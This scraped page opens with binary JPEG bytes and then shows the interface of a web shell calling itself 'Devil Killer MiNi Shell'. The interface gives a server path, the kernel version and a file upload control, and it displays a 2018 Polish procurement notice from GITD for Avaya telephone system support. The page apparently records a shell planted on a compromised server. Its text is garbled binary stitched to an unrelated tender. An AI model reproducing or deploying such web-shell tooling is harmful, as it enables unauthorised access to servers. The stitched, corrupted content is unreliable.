JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20181203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20181203/656348-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 656348-N-2018 z dnia 2018-12-03 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Główny Inspektorat Transportu Drogowego</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Przedłużenie wsparcia serwisowego producenta Avaya wraz ze wsparciem utrzymaniowym systemu telefonii stacjonarnej Avaya</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Główny Inspektorat Transportu Drogowego</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">1742760400000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Al. Jerozolimskie</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">94</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">00807 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">222 204 801</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowieniapubliczne@gitd.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">222 204 899</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.gitd.gov.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa centralna</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.gitd.gov.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.gitd.gov.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Przedłużenie wsparcia serwisowego producenta Avaya wraz ze wsparciem utrzymaniowym systemu telefonii stacjonarnej Avaya</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">BDG.ZPB.230.54.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci">Nie dotyczy</span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">Na wszystkie części</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest Wsparcie utrzymaniowe systemu telefonii stacjonarnej AVAYA wraz z przedłużeniem wsparcia serwisowego producenta AVAYA z podziałem na części:Część 1: Przedłużenie wsparcia serwisowego producenta AVAYA.Część 2: Wsparcie utrzymaniowe systemu telefonii stacjonarnej AVAYA.W skład Systemu wchodzą następujące urządzenia:Lokalizacji Al. Jerozolimskie 94:	Serwer sterujący HP DL360G7 (CMM)MediaGateway G450; Serwer BCMS/CDR; Serwer AES; Serwer IVR (EP); Serwer ACR; 20 szt. stacji bazowych IP DECT IPBS2.Lokalizacja Przyczółkowa 109A:	MediaGateway G450; Serwer sterujący HP DL360G7(CMM/ESS); 11 lokalizacji na terenie Polski:	MediaGateway G430; Dodatkowo:Element:	Ilość:Switch AVAYA ERS 4826 GTS-PWR	20 szt.Telefon Avaya 1608	600 szt.Telefon Avaya 1616	200 szt.Telefon Avaya 9611G	20 szt.Telefon 9641G	16 szt.Telefon Avaya 9670G	20 szt.Przystawki rozszerzające do telefonów Avaya 1616	10 szt.Telefony IP DECT 3720 wraz ze stacjami dokującymi	50 szt.Część 1Przedłużenie wsparcia serwisowego producenta dla elementów określonych poniżej na okres 01.01.2019 r. - 31.12.2019 r.Przedłużenie wsparcia producenta na urządzenia DATA:Element:	Ilość:ERS 4826GTS-PWR+ with 24 10/100/1000 802.3at PoE+ &2 SFP ports plus 2 SFP+ ports & HiStack ports. Inc. Base Software License, 1 Field replaceable 1000W PSU & 46cm stack cable. EU PC 20 szt.Przedłużenie wsparcia producenta na system telekomunikacyjny:Element:	Ilość:SA ESS AAEP6 PER PT 1YPP	15 szt.AVAYA SA ESS AAEP6 PER PT CONN CM6 1YPP	15 szt.AVAYA SA ESS AES R6 BSC TSAPI 1YPP	15 szt.AVAYA SA ESS C/D AURATM R6 ANLG 1YPP	58 szt.AVAYA SA ESS C/D AURA R6 FND 1YPP	1050 szt.SA ESS C/D CCR6 ELITE AGT 1-100 1YPP	17 szt.Realizacja usługi nastąpi poprzez dostarczenie certyfikatu producenta sprzętu oraz dostarczenie odpowiednich licencji, w szczególności na system automatycznego lektora.Część 2W ramach Części 2 Wykonawca będzie świadczył następujące usługi:1.	Usługi Administracyjne - testowanie, pomiary, diagnostyka oraz zmiany, w szczególności:1)	zmiany uprawnień dla abonentów,2)	dodawanie nowych stacji i użytkowników,3)	narzucanie kodów dostępu,4)	programowanie aparatów (nie dotyczy programowania aparatów możliwego do wykonania z poziomu użytkownika),5)	realizacja dodatkowych usług dla abonentów w ramach posiadanych przez Zamawiającego licencji,6)	diagnozowanie Systemu Avaya na podstawie zgłoszenia zdarzenia uzyskanego od Zamawiającego,7)	wprowadzanie i testowanie zmian w Systemie na podstawie uzyskanych informacji diagnostycznych,8)	zdalne łączenie się z Systemem w celu dokonywania pomiarów, diagnostyki, raportów, testów oraz zmian w Systemie,9)	systematyczny monitoring stanu Systemów Avaya,10)	monitoring łączy zewnętrznych (cyfrowych, analogowych, IP),11)	usuwanie usterek łączy zewnętrznych (w zakresie dostępnym za pomocą oprogramowania administracyjnego),12)	wykonanie software'owych testów aparatów,13)	tworzenie grup abonenckich i skilli,14)	dokonywanie zmian w Systemie,15)	Obsługa oraz wsparcie techniczne dla urządzeń i systemów wymienionych dla cz. 1 i cz. 2 w pkt. 4.316)	wykonywanie usług związanych z rozbudową Systemu Avaya w ramach istniejącej wersji,17)	instalacja aktualizacji oprogramowania producenta,18)	modyfikacje drzewa IVR i komunikatów głosowych,19)	zmiany konfiguracji i/lub parametrów Call Center,20)	udzielenie pomocy i wsparcia technicznego podczas planowanej zmiany lokalizacji GITD,21)	aktywacja oraz sprawdzenie prawidłowości licencji posiadanych przez Zamawiającego na wsparcie producenta urządzeń,22)	systematyczny monitoring oraz konfiguracja systemu taryfikacji Telbaza SQL,23)	administracja systemem IP-Dect (aktualizacja, konfiguracja,monitoring systemu),24)	wykonywanie zestawień z systemu taryfikacyjnego,25)	tworzenie/nagrywanie komunikatów na życzenie (posiadanie licencjonowanego programu do syntezy mowy),26)	administracja systemem Basic Call Management System (aktualizacja, konfiguracja),27)	administracja systemem Avaya Contact Recorder (aktualizacja, konfiguracja),28)	Diagnozowanie i naprawy usterek sprzętu fizycznego (serwerów, media gateways) na którym działają usługi centrali Avaya(koszty zakupu części potrzebnych do napraw ponosi zamawiający). Konsultacje techniczne obejmujące, w szczególności:1)	konsultacje dotyczące łączy zewnętrznych systemu,2)	konsultacje dotyczące łączy wewnętrznych systemu,3)	konsultacje dotyczące obsługi terminali systemowych, aparatów analogowych, oraz IP podłączonych do systemu,4)	informacje na temat funkcji i usług dostępnych w systemie,5)	optymalizacja pracy systemu,6)	przekierowanie ruchu telefonicznego w sytuacjach awaryjnych,7)	udzielanie informacji oraz obsługa z zakresu terminala administrującego,8)	konsultacje dotyczące oprogramowania administracyjnego,9)	konsultacje dotyczące możliwości rozbudowy systemu,10)	konsultacje dotyczące możliwości unowocześnienia systemu,11)	konsultacje dotyczące możliwości podłączenia urządzeń zewnętrznych do systemu (np. programy wspomagające Call Center, aplikacje CTI, systemy ERP/CRM),12)	konsultacje w zakresie obsługi systemu poczty głosowej,13)	konsultacje w zakresie obsługi systemu taryfikacji Telbaza SQL,14)	konsultacje w zakresie obsługi systemu nagrywania połączeń,15)	konsultacje w zakresie optymalizacji pracy Call Center. Realizacja zgłoszeń:1)	Zgłoszenia będą dokonywane przez Zamawiającego i realizowane przez Wykonawcę w dni pracy urzędu Zamawiającego od godziny 08:15 do 16:15 z tym jednak zastrzeżeniem, że w przypadku gdy realizacja zgłoszenia przekroczy godzinę 16:15 to wydłuży się ona o czas niezbędny do jego realizacji, zgodnie z Czasem realizacji wskazanym poniżej. Poniżej załączona tabela czasów reakcji i realizacji zgłoszeń.Priorytet Zgłoszenia	Czas reakcji	Czas realizacjiZgłoszenie Krytyczne	do 2 godzin - w przypadku zaoferowania przez Wykonawcę w formularzu oferty krótszego terminu wiążący jest termin krótszy,	do 6 godzin - w przypadku zaoferowania przez Wykonawcę w formularzu oferty krótszego terminu wiążący jest termin krótszy,Zgłoszenie Ważne	do 2 godzin - w przypadku zaoferowania przez Wykonawcę w formularzu oferty krótszego terminu wiążący jest termin krótszy,	do 12 godzinZgłoszenie Drobne	do 2 godzin - w przypadku zaoferowania przez Wykonawcę w formularzu oferty krótszego terminu wiążący jest termin krótszy,	do 24 godzin2)	Klasyfikacja zgłoszeń:a)	Zgłoszenie KRYTYCZNE - obejmują usterki uniemożliwiające pracę użytkowników GITD poprzez brak komunikacji telefonicznej wewnętrznej lub zewnętrznej.b)	Zgłoszenie WAŻNE - praca użytkowników GITD nie jest niemożliwa, ale jest utrudniona.c)	Zgłoszenie DROBNE - Wykonawca dokonuje prostej zmiany konfiguracyjnej nie mającej wpływu na stabilność systemu.3)	REALIZACJA - wykonanie zgłoszenia przez Wykonawcę, w szczególności poprzez dokonanie zmian w konfiguracji centrali telefonicznej lub innych urządzeń wchodzących w skład systemu skutkujące w przypadku Zgłoszenia Krytycznego lub Ważnego przywróceniem prawidłowego funkcjonowania systemu, zaś w przypadku Zgłoszenia Drobnego zmianą konfiguracji.4)	CZAS REALIZACJI - czas liczony od momentu przekazania zgłoszenia do momentu realizacji Zgłoszenia; do czasu realizacji wliczany jest czas reakcji.5)	CZAS REAKCJI - czas liczony od momentu przekazania zgłoszenia do chwili podjęcia działań zmierzających do jego realizacji lub usunięcia usterki.6)	ZGŁOSZENIE - przekazanie zgłoszenia może się odbyć przez e-mail lub telefonicznie lub za pośrednictwem aplikacji WWW.7)	Udzielenie wsparcia proaktywnego a w tym:a)	przegląd logów i rozwiązywanie ewentualnych problemów (nie rzadziej niż raz na miesiąc),b)	sprawdzenie i ewentualna aktualizacja firmware (nie rzadziej niż raz na miesiąc),c)	sprawdzenie i ewentualna aktualizacja oprogramowania (nie rzadziej niż raz na miesiąc),d)	optymalizacja i zalecenia oraz (po konsultacji) wdrożenie usprawnień (nie rzadziej niż raz na miesiąc),e)	testy funkcjonalne środowiska oraz testy prawidłowości konfiguracji włącznie z wykrytymi podatnościami oraz sposobami i zaleceniami ich usunięcia (nie rzadziej niż raz na miesiąc);8)	Wdrażanie nowych rozwiązań i konfiguracji w porozumieniu z Zamawiającym;9)	Zapewnienie możliwości telefonicznych konsultacji rozwiązań dotyczących sprzętu podlegającego opiece;10)	Dokonywanie napraw nieprawidłowo działającej konfiguracji infrastruktury Zamawiającego (naprawą nie jest objęty sprzęt i urządzenia techniczne);11)	Zapewnienia kanału zgłoszeniowego działającego w trybie ciągłym w czasie wskazanym w pkt 1), np. e-mail, aplikacja WWW;12)	Prace rozwojowe polegające na konfiguracji nowych funkcjonalności w tym tworzenie nowych rozwiązań IVR. Zamawiający przewiduje wykorzystanie maksymalnie 300 roboczogodzin.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71356300-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>64215000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">250000,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa warunku we wskazanym 